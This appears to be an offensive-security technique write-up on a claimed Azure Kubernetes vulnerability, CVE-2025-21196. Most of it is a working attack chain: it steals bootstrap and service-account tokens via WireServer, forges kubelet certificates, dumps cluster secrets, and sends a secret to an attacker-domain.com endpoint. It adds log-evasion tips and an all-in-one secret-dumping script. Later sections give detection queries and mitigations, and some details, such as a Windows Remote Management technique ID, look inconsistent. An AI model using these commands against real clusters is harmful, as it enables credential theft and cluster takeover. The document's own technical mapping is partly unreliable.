| Attribute | Details |
|---|---|
| Technique ID | CONTAINER-001 |
| MITRE ATT&CK v18.1 | T1021.006 - Remote Services: Windows Remote Management |
| Tactic | Lateral Movement / Initial Access |
| Platforms | Entra ID (Azure AKS, Azure Container Instances) |
| Severity | Critical |
| CVE | CVE-2025-21196 |
| Technique Status | ACTIVE |
| Last Verified | 2025-02-12 |
| Affected Versions | AKS 1.25.0 - 1.28.3, ACI all instances (container images pre-Feb 2025) |
| Patched In | AKS 1.28.4+, ACI: container images rebuilt post-Feb 2025 |
| Author | SERVTEP – Artur Pchelnikau |
Concept: CVE-2025-21196 is a critical vulnerability in Microsoft Azure’s Kubernetes orchestration layer affecting Azure Kubernetes Service (AKS) and Azure Container Instances (ACI). The vulnerability stems from misconfigured access controls within the container orchestration layer that bypass authentication mechanisms, allowing unauthorized access to containerized workloads. An attacker with pod execution privileges can exploit undocumented endpoints (WireServer, HostGAPlugin) on AKS nodes to retrieve TLS bootstrap tokens, perform TLS bootstrap attacks, and gain full API server access without requiring host network privileges or root access. The attack chain mirrors the 2018 Google Kubernetes Engine (GKE) bootstrap token vulnerability.
Attack Surface: Azure AKS node configuration endpoints, Kubernetes API server RBAC enforcement, service account token management, and the etcd backend storing cluster secrets.
Business Impact: Complete cluster compromise including data exfiltration, ransomware deployment, and service disruption. Organizations using AKS to run containerized workloads face immediate risk of credential theft, arbitrary code execution, access to all cluster secrets across namespaces, and potential financial/reputational damage through regulatory violations (GDPR, HIPAA, CCPA).
Technical Context: Exploitation typically requires initial pod execution access (obtained through application vulnerabilities, misconfigurations, or lateral movement). Once achieved, token extraction is rapid (seconds) and leaves minimal forensic traces if audit logging is misconfigured. Detection likelihood is medium-to-low if API audit logs are not properly configured, but forensic recovery is straightforward via audit log analysis.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Kubernetes Benchmark | 4.1.1-4.1.2 | RBAC enforcement and service account token management failures |
| DISA STIG | V-242376 | Kubernetes API server must enforce authentication for all requests |
| CISA SCuBA | AC-2 | Account and access management controls in cloud containers |
| NIST 800-53 | AC-2, AC-3, SI-4 | Account management, access enforcement, system monitoring |
| GDPR | Article 32 | Security of processing; cryptographic controls failure |
| DORA | Article 9 | Protection and prevention of ICT-related incidents |
| NIS2 | Article 21 | Cyber risk management measures (critical infrastructure) |
| ISO 27001 | A.9.2.3, A.9.4.3 | Management of privileged access; cryptographic key management |
| ISO 27005 | Section 8 | Information security risk assessment; token compromise risk scenario |
Supported Versions:
curl or wget (for metadata endpoint access)kubectl (for API server interaction)openssl (for certificate inspection and CSR generation)Command (Linux/Bash):
# Check if running inside a pod
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
echo "Running in Kubernetes pod"
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
KUBE_CA=$(cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt)
KUBE_API_SERVER="https://$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace).$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
echo "API Server: $KUBE_API_SERVER"
fi
# Check Azure WireServer endpoint accessibility
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2017-12-01" | jq . | head -20
What to Look For:
vmScaleSetName or vmName indicates node detailsCommand (If pod has host network namespace):
# Check if pod is running with host network
ip route | grep default
netstat -tlnp | grep 10250 # Kubelet port
What to Look For:
Supported Versions: AKS 1.25.0 - 1.28.3
Objective: Confirm execution context and determine available permissions
Command:
kubectl auth can-i get secrets --as=system:serviceaccount:$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace):default
Expected Output:
yes
What This Means:
OpSec & Evasion:
history -c after executioneval $COMMANDObjective: Retrieve encrypted node provisioning configuration containing TLS bootstrap token
Command:
# From within the pod or if host network is accessible
WIRESERVER_IP="168.63.129.16" # Azure WireServer fixed IP
curl -s -X GET "http://${WIRESERVER_IP}/metadata/instance/compute?api-version=2017-12-01" \
-H "Metadata:true" | jq '.vmScaleSetName, .vmId, .location'
# Query HostGAPlugin for encrypted settings (requires specific permissions)
curl -s -X POST "http://${WIRESERVER_IP}/machine/?comp=guestConfigurationRequest" \
-H "Content-Type: application/json" \
-d '{"httpRequest": {"requestUri": "/wireserver/fetch-config"}}' | base64 -d 2>/dev/null
Expected Output:
{
"compute": {
"vmScaleSetName": "aks-nodepool1-12345678-vmss",
"vmId": "123e4567-e89b-12d3-a456-426614174000",
"location": "eastus"
}
}
What This Means:
OpSec & Evasion:
-A "Mozilla/5.0" to blend inObjective: Retrieve plaintext bootstrap token from CSE (Custom Script Extension) data
Command:
# Requires compromised node shell access or WireServer exploitation
# This would typically be in the CSE provisioning script
ssh -i <node_key> azureuser@<node_ip> "cat /var/lib/waagent/*/HandlerState" 2>/dev/null || \
echo "Attempting alternative extraction from /proc or environment..."
# If pod has access to node filesystem (rare mount scenario)
cat /host/var/lib/waagent/*/status/* 2>/dev/null | grep -oP 'TLS_BOOTSTRAP_TOKEN["\']?\s*[:=]\s*["\']?\K[^"\']*'
# Or retrieve from WireServer encrypted blob and decrypt
curl -s "http://168.63.129.16/machine/?comp=guestConfigurationRequest" \
-H "Content-Type: application/json" | \
python3 -c "import sys, base64, json; data=json.load(sys.stdin); \
print(base64.b64decode(data['protectedSettings']).decode())" 2>/dev/null
Expected Output:
TLS_BOOTSTRAP_TOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
What This Means:
jwt.io or locallyOpSec & Evasion:
Troubleshooting:
Objective: Authenticate to Kubernetes API and request node certificate
Command:
# Decode bootstrap token
BOOTSTRAP_TOKEN="<extracted_token_from_step3>"
# Create CSR for a new node (kubelet certificate)
openssl req -new -newkey rsa:2048 -keyout kubelet.key -out kubelet.csr \
-subj "/CN=system:node:compromised-node/O=system:nodes"
# Submit CSR to Kubernetes API using bootstrap token
KUBE_API="https://<aks-cluster-name>.<region>.azmk8s.io"
curl -s -X POST "$KUBE_API/apis/certificates.k8s.io/v1/certificatesigningrequests" \
-H "Authorization: Bearer $BOOTSTRAP_TOKEN" \
-H "Content-Type: application/json" \
-d @- << 'EOF'
{
"apiVersion": "certificates.k8s.io/v1",
"kind": "CertificateSigningRequest",
"metadata": {
"name": "compromised-kubelet-cert"
},
"spec": {
"request": "$(cat kubelet.csr | base64 -w0)",
"signerName": "kubernetes.io/kubelet-serving",
"usages": ["digital signature", "key encipherment", "server auth"]
}
}
EOF
# The API server auto-approves CSRs from bootstrap token
# Retrieve the signed certificate
curl -s -X GET "$KUBE_API/apis/certificates.k8s.io/v1/certificatesigningrequests/compromised-kubelet-cert" \
-H "Authorization: Bearer $BOOTSTRAP_TOKEN" | jq '.status.certificate' -r | base64 -d > kubelet.crt
Expected Output:
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUfkQiJsHqN8...
-----END CERTIFICATE-----
What This Means:
OpSec & Evasion:
Objective: Use obtained certificate to access Kubernetes API and dump all secrets
Command:
# Use kubelet certificate to authenticate
KUBE_API="https://<aks-cluster-name>.<region>.azmk8s.io"
# List all secrets in all namespaces
curl -s -X GET "$KUBE_API/api/v1/secrets" \
--cert kubelet.crt --key kubelet.key \
--cacert ca.crt | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, data: .data}'
# Extract specific secret (e.g., database credentials)
curl -s -X GET "$KUBE_API/api/v1/namespaces/production/secrets/db-credentials" \
--cert kubelet.crt --key kubelet.key \
--cacert ca.crt | jq '.data | to_entries[] | {key: .key, value: (.value | @base64d)}'
# Exfiltrate to attacker-controlled endpoint
curl -s -X GET "$KUBE_API/api/v1/namespaces/production/secrets/db-credentials" \
--cert kubelet.crt --key kubelet.key --cacert ca.crt | \
curl -X POST "https://attacker-domain.com/collect" \
-d @- --silent --output /dev/null
Expected Output:
{
"database_username": "prod_user",
"database_password": "SuperSecret123!",
"connection_string": "postgresql://prod_user:SuperSecret123!@db.internal:5432/prod_db"
}
What This Means:
OpSec & Evasion:
Supported Versions: AKS 1.25.0 - 1.28.3 (specifically vulnerable to host namespace exposure)
Objective: Determine if pod has access to host processes
Command:
# Check if pod is running with hostNetwork: true
ip route | grep -q "via.*dev eth0" && echo "Host network isolated" || echo "Host network shared!"
# Alternative: Check proc filesystem
ls /proc/1/ns/net | grep -q "4026531956" && echo "Host network" || echo "Container network"
# If host network, directly access kubelet port
curl -s https://localhost:10250/api/v1/nodes --insecure | jq '.items[].metadata.name'
Expected Output (if vulnerable):
Host network shared!
aks-nodepool1-12345678-000000
aks-nodepool1-12345678-000001
What This Means:
Objective: Retrieve long-lived kubelet authentication token
Command:
# If pod has volumeMount to host filesystem (rare)
cat /host/var/lib/kubelet/kubeconfig 2>/dev/null | grep token | awk '{print $2}' | xargs -I {} echo "Kubelet token: {}"
# If host network but no filesystem mount, use proc to read kubelet process memory
strings /proc/$(pgrep -f "kubelet.*" | head -1)/environ 2>/dev/null | grep -i "kubeconfig\|token"
# Alternative: Read certificate directly
cat /host/var/lib/kubelet/pki/kubelet-client-current.pem 2>/dev/null
Expected Output:
Kubelet token: eyJhbGciOiJSUzI1NiIsImtpZCI6IkJWM1...
What This Means:
Objective: Use exfiltrated credentials from remote attacker infrastructure
Command (On Attacker’s Kali/Parrot Machine):
# Create kubeconfig from stolen credentials
cat > ~/.kube/config << 'EOF'
apiVersion: v1
clusters:
- cluster:
insecure-skip-tls-verify: true
server: https://<aks-cluster-name>.<region>.azmk8s.io
name: aks-cluster
contexts:
- context:
cluster: aks-cluster
user: kubelet
name: default
current-context: default
kind: Config
preferences: {}
users:
- name: kubelet
user:
token: <KUBELET_TOKEN>
EOF
# Enumerate cluster resources
kubectl get nodes
kubectl get secrets --all-namespaces
kubectl get pods --all-namespaces
Expected Output:
NAME STATUS ROLES AGE VERSION
aks-nodepool1-12345678-000000 Ready agent 30d v1.28.2
aks-nodepool1-12345678-000001 Ready agent 30d v1.28.2
NAMESPACE NAME TYPE DATA
kube-system bootstrap-token-abcd1 bootstrap.token 6
production db-credentials Opaque 3
default default-token-xyz kubernetes.io/service-account-token 3
What This Means:
Supported Versions: AKS 1.25.0 - 1.28.3 (all versions with default token mounting)
Objective: Read mounted token from pod’s service account
Command:
# Default location inside any pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Store for exfiltration
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN
Expected Output:
eyJhbGciOiJSUzI1NiIsImtpZCI6IlBYVkRLVjBCOE1"...
What This Means:
Objective: Determine what the stolen token can do
Command:
# Decode JWT (online via jwt.io or locally)
echo $TOKEN | cut -d'.' -f2 | base64 -d | jq '.'
# Test token permissions
KUBE_API="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
CA_CERT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
curl -s -X GET "$KUBE_API/api/v1/namespaces" \
--cacert $CA_CERT \
-H "Authorization: Bearer $TOKEN" | jq '.items[].metadata.name'
Expected Output:
{
"iss": "https://aks-cluster.azmk8s.io",
"sub": "system:serviceaccount:default:default",
"aud": ["https://kubernetes.default.svc.cluster.local"]
}
Objective: Use token to access other services or namespaces
Command:
# List accessible secrets
curl -s -X GET "$KUBE_API/api/v1/secrets" \
--cacert $CA_CERT \
-H "Authorization: Bearer $TOKEN" | jq '.items[] | {name: .metadata.name, namespace: .metadata.namespace}'
# Access production namespace secrets if default SA has permissions
curl -s -X GET "$KUBE_API/api/v1/namespaces/production/secrets" \
--cacert $CA_CERT \
-H "Authorization: Bearer $TOKEN" | jq '.items[].data'
OpSec & Evasion:
Version: 1.25.0+ Minimum Version: 1.24.0 Supported Platforms: Linux, macOS, Windows
Installation:
# Linux
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl && sudo mv kubectl /usr/local/bin/
# macOS (Homebrew)
brew install kubernetes-cli
# Verify
kubectl version --client
Version-Specific Notes:
Usage:
# Export kubeconfig
export KUBECONFIG=~/.kube/config
# List all secrets
kubectl get secrets --all-namespaces
# Decode secret
kubectl get secret <name> -n <namespace> -o jsonpath='{.data}' | jq '.database_password | @base64d'
Version: 7.80.0+ Minimum Version: 7.0.0 Supported Platforms: All
Installation:
# Linux (Debian/Ubuntu)
sudo apt-get install curl
# Fedora/RHEL
sudo dnf install curl
# macOS
brew install curl
Usage for Kubernetes API:
curl -s -X GET "https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/api/v1/secrets" \
--cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
-H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
Version: 1.1.1+ Minimum Version: 1.0.2 Supported Platforms: All
Installation:
# Linux
sudo apt-get install openssl
# macOS
brew install openssl
# Verify
openssl version
Usage for CSR Generation:
# Generate key and CSR
openssl req -new -newkey rsa:2048 -keyout node.key -out node.csr \
-subj "/CN=system:node:aks-node/O=system:nodes"
# Inspect certificate
openssl x509 -in certificate.pem -text -noout
#!/bin/bash
# CONTAINER-001 exploitation chain (single script)
echo "[+] Extracting service account token..."
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
API_SERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
echo "[+] Listing all namespaces..."
curl -s "$API_SERVER/api/v1/namespaces" --cacert $CA \
-H "Authorization: Bearer $TOKEN" | jq '.items[] | .metadata.name'
echo "[+] Extracting secrets from all namespaces..."
for ns in $(curl -s "$API_SERVER/api/v1/namespaces" --cacert $CA \
-H "Authorization: Bearer $TOKEN" | jq -r '.items[].metadata.name'); do
echo "[*] Namespace: $ns"
curl -s "$API_SERVER/api/v1/namespaces/$ns/secrets" --cacert $CA \
-H "Authorization: Bearer $TOKEN" | jq -r '.items[] | @base64d' 2>/dev/null
done
echo "[+] Done. Exfiltrate token: $TOKEN"
Endpoint: http://169.254.169.254/metadata/instance
Purpose: Returns node and VM scale set metadata
Authentication: Header Metadata:true required
Usage:
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2017-12-01"
What Information is Leaked:
| Endpoint | Method | Purpose |
|---|---|---|
/api/v1/secrets |
GET | List all secrets in all namespaces |
/api/v1/namespaces/{ns}/secrets |
GET | List secrets in specific namespace |
/api/v1/namespaces/{ns}/secrets/{name} |
GET | Read specific secret |
/apis/certificates.k8s.io/v1/certificatesigningrequests |
POST | Submit certificate signing request |
/api/v1/nodes |
GET | List cluster nodes |
/api/v1/serviceaccounts |
GET | List service accounts |
Rule Configuration:
KQL Query:
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.CONTAINERSERVICE"
and Category == "kube-audit"
and properties.verb == "create"
and properties.objectRef.resource == "certificatesigningrequests"
and (properties.user.username startswith "system:serviceaccount:" or
properties.user.username == "system:anonymous")
| extend principalId = tostring(properties.principalId),
userName = tostring(properties.user.username),
CSRName = tostring(properties.objectRef.name)
| summarize CSRCount = count(),
UniqueUsers = dcount(userName),
UniqueCSRs = dcount(CSRName)
by principalId, bin(TimeGenerated, 10m)
| where CSRCount > 2
| project TimeGenerated, principalId, CSRCount, UniqueUsers, UniqueCSRs
What This Detects:
Manual Configuration Steps (Azure Portal):
Suspicious Kubernetes CSR RequestsHigh10 minutes30 minutesRule Configuration:
KQL Query:
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.CONTAINERSERVICE"
and Category == "kube-audit"
and properties.verb in ("list", "get")
and properties.objectRef.resource == "serviceaccounttokens"
and properties.requestStatus == "Success"
| extend user = tostring(properties.user.username),
sourceIP = tostring(properties.sourceIPs[0]),
namespace = tostring(properties.objectRef.namespace)
| summarize TokenAccessCount = count(),
UniqueNamespaces = dcount(namespace),
FailedAttempts = countif(properties.requestStatus == "Failure")
by user, sourceIP, bin(TimeGenerated, 5m)
| where TokenAccessCount > 5 or UniqueNamespaces > 3
| project TimeGenerated, user, sourceIP, TokenAccessCount, UniqueNamespaces, FailedAttempts
Note: Kubernetes API Server audit logs are stored in Azure Activity Log (not Windows Event Viewer). However, if Azure Monitor Agent is deployed on nodes, collect the following:
Event ID: 4688 (Process Creation)
Image contains "kubectl" OR Image contains "curl" OR Image contains "openssl"Manual Configuration Steps (Group Policy - Deployed to AKS Nodes via DaemonSet):
Minimum Sysmon Version: 13.0+ Supported Platforms: Linux (via osquery if Sysmon is not available)
Sysmon Configuration (XML):
<Sysmon schemaversion="4.80">
<EventFiltering>
<!-- Monitor for certificate operations -->
<RuleGroup name="Kubernetes" groupRelation="or">
<FileCreate onmatch="include">
<TargetFilename condition="contains">/var/lib/kubelet/kubeconfig</TargetFilename>
<TargetFilename condition="contains">kubelet.csr</TargetFilename>
<TargetFilename condition="contains">kubelet.crt</TargetFilename>
</FileCreate>
<!-- Monitor network connections to API server -->
<NetworkConnect onmatch="include">
<DestinationPort condition="is">6443</DestinationPort>
<DestinationPort condition="is">10250</DestinationPort>
<Image condition="contains">curl</Image>
<Image condition="contains">kubectl</Image>
</NetworkConnect>
<!-- Monitor for credential dumping tools -->
<ProcessCreate onmatch="include">
<CommandLine condition="contains">openssl</CommandLine>
<CommandLine condition="contains">jwt</CommandLine>
<CommandLine condition="contains">base64</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>
Manual Configuration Steps:
sysmon-k8s.xml with the above contentAlert Name: Suspicious Kubernetes API Server Activity
Manual Configuration Steps (Enable Defender for Cloud):
Reference: Microsoft Defender for Cloud Kubernetes Alerts
# Connect to your Azure tenant
Connect-AzAccount
# Search for suspicious service account token access
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) `
-EndDate (Get-Date) `
-Operations "AKS_API_Call", "Certificate_Signed", "Secret_Accessed" `
-FreeText "serviceaccount" | Select-Object UserIds, Operation, AuditData | Export-Csv audit_results.csv
Manual Configuration Steps (Microsoft Purview Compliance Portal):
Disable Anonymous API Access: Prevent unauthenticated requests to Kubernetes API Applies To Versions: AKS 1.25.0+
Manual Steps (Azure Portal):
0.0.0.0/0 to Deny list (or explicitly allow IP ranges)Manual Steps (Azure CLI):
az aks update --name myCluster --resource-group myRG \
--api-server-authorized-ip-ranges 10.0.0.0/8,192.168.0.0/16
Validation Command:
curl -s https://<aks-cluster>.azmk8s.io/api/v1 2>&1 | grep -q "401\|403" && echo "PROTECTED" || echo "VULNERABLE"
Enable Kubernetes RBAC and Audit Logging: Ensure all API calls are logged and access is restricted Applies To Versions: AKS 1.25.0+
Manual Steps (Azure Portal):
Manual Steps (Azure CLI):
az aks update --name myCluster --resource-group myRG \
--enable-managed-identity \
--enable-aad
Implement Network Policies: Isolate pod-to-pod communication to prevent lateral movement Applies To Versions: AKS 1.25.0+
Manual Steps:
kubectl apply -f https://raw.githubusercontent.com/projectcalico/calico/v3.24.0/manifests/tigera-operator.yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny
namespace: default
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
Use Short-Lived Service Account Tokens: Implement token expiration Applies To Versions: AKS 1.29.0+
Manual Steps (Kubernetes 1.29+):
kubectl patch serviceaccount default -p '{"automountServiceAccountToken": false}'
# For applications that need tokens, use projected volumes with expiration
kubectl apply -f - << 'EOF'
apiVersion: v1
kind: Pod
metadata:
name: app-pod
spec:
serviceAccountName: app
containers:
- name: app
image: myapp:latest
volumeMounts:
- name: sa-token
mountPath: /var/run/secrets/tokens
volumes:
- name: sa-token
projected:
sources:
- serviceAccountToken:
audience: api
expirationSeconds: 3600
path: token
EOF
kubectl get rolebindings --all-namespaces -o wide
kubectl get clusterrolebindings -o wide
kubectl delete clusterrolebinding system:default-cluster-admin
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: default
name: pod-reader
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list"]
Restrict AKS API Access# Check if default service account has cluster-admin
kubectl get clusterrolebinding -o wide | grep "system:default"
# Expected output: NONE (empty)
# If you see cluster-admin binding, it's over-permissive
Manual Steps (Azure CLI):
az aks update --name myCluster --resource-group myRG \
--enable-disk-encryption \
--encryption-at-host
/var/lib/kubelet/kubeconfig (kubelet configuration with tokens)/var/lib/kubelet/pki/kubelet-client-current.pem (kubelet client certificate)kubelet.key, kubelet.csr, kubelet.crt (locally generated certificates)
Registry: Not applicable (Kubernetes stores configurations in etcd, not Windows Registry)
*.azmk8s.io (AKS API endpoint)168.63.129.16:80 (Azure WireServer)*.azmk8s.ioproperties.verb == "create" AND properties.objectRef.resource == "certificatesigningrequests"Retention: 90 days default
/var/log/containers/* on AKS nodesWhat to look for: Unusual API calls, token enumeration, secret access
Query: Operations on AKS cluster (updates, role assignments, diagnostics changes)
# Immediately disable the compromised node pool
az aks nodepool update --cluster-name myCluster --name nodepool1 \
--resource-group myRG --mode System --disable-cluster-autoscale
# Cordon the nodes to prevent new pod scheduling
kubectl cordon -l agentpool=nodepool1
Manual (Azure Portal):
# Export Kubernetes audit logs
az monitor log-analytics query \
--workspace <workspace-id> \
--analytics-query "AzureDiagnostics | where ResourceProvider == 'MICROSOFT.CONTAINERSERVICE' | where TimeGenerated > ago(7d)"
# Export node logs
for node in $(kubectl get nodes -o name); do
kubectl debug $node -it --image=ubuntu -- \
tar czf /tmp/node-logs.tar.gz /var/log/
done
Manual (Azure Portal):
# Revoke all service account tokens by recreating secrets
kubectl delete secret -n kube-system bootstrap-token-abcd1 || true
# Rotate AKS cluster credentials
az aks rotate-certs --resource-group myRG --name myCluster
# Delete any compromised pods
kubectl delete pod <compromised-pod-name> -n <namespace>
# Restart kubelet to clear cached tokens
systemctl restart kubelet
Long-Term Remediation:
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-004] Kubelet API Unauthorized Access | Attacker discovers exposed kubelet port without authentication |
| 2 | Privilege Escalation | [PE-EXPLOIT-004] Container Escape to Host | Attacker escapes container and gains host access |
| 3 | Credential Access | [CONTAINER-001] Kubernetes API Server Compromise | Attacker extracts bootstrap tokens and obtains cluster API access |
| 4 | Credential Access | [CONTAINER-002] Container Orchestration Secret Theft | Attacker lists and exfiltrates all cluster secrets |
| 5 | Lateral Movement | [LM-AUTH-030] AKS Service Account Token Theft | Attacker uses stolen tokens for remote cluster access |
| 6 | Impact | Data exfiltration, ransomware deployment, cluster takeover | Attacker achieves full control of containerized workloads |